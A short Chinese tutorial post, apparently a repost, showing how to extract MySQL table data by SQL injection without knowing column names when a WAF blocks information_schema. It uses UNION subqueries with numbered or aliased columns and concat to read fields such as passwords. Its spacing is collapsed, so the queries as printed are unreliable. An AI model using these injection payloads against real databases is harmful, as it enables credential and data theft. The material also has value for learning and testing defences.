不知道列名的情况下注入

不知道列名的情况下注入_第1张图片

0x00 简介

在 mysql => 5 的版本中存在库information_schema,记录着mysql中所有表的结构,通常,在mysql sqli中,我们会通过此库中的表去获取其他表的结构,即表名,列名等。但是这个库也会经常被WAF过滤。当我们通过暴力破解获取到表名后,该如何进行下一步利用呢?

在information_schema中,除了SCHEMATA,TABLES,COLUMNS有表信息外,高版本的mysql中,还有INNODB_TABLES及INNODB_COLUMNS中记录着表结构。

0x01 不使用表名查询

正常的查询如下:

不知道列名的情况下注入_第2张图片

其中,列名为id,name,pass,mail,phone,使用union查询

select1,2,3,4,5unionselect*fromusers;

不知道列名的情况下注入_第3张图片

接着,就可以继续使用数字来对应列,如3对应了表里面的pass:

select`3`from (select1,2,3,4,5unionselect*fromusers)a;

不知道列名的情况下注入_第4张图片

当  ` 不能使用的时候,使用别名来代替:

selectb from (select1,2,3asb,4,5unionselect*fromusers)a;

不知道列名的情况下注入_第5张图片

在注入中查询多个列:

selectconcat(`2`,0x3a,`3`) from (select1,2,3,4,5unionselect*fromusers)alimit1,1;

不知道列名的情况下注入_第6张图片

FROM:Extracting data without knowing columns names

更多精彩内容请关注公众号Kay0898,干货请加入知识星球ID:19483446

你可能感兴趣的:(不知道列名的情况下注入)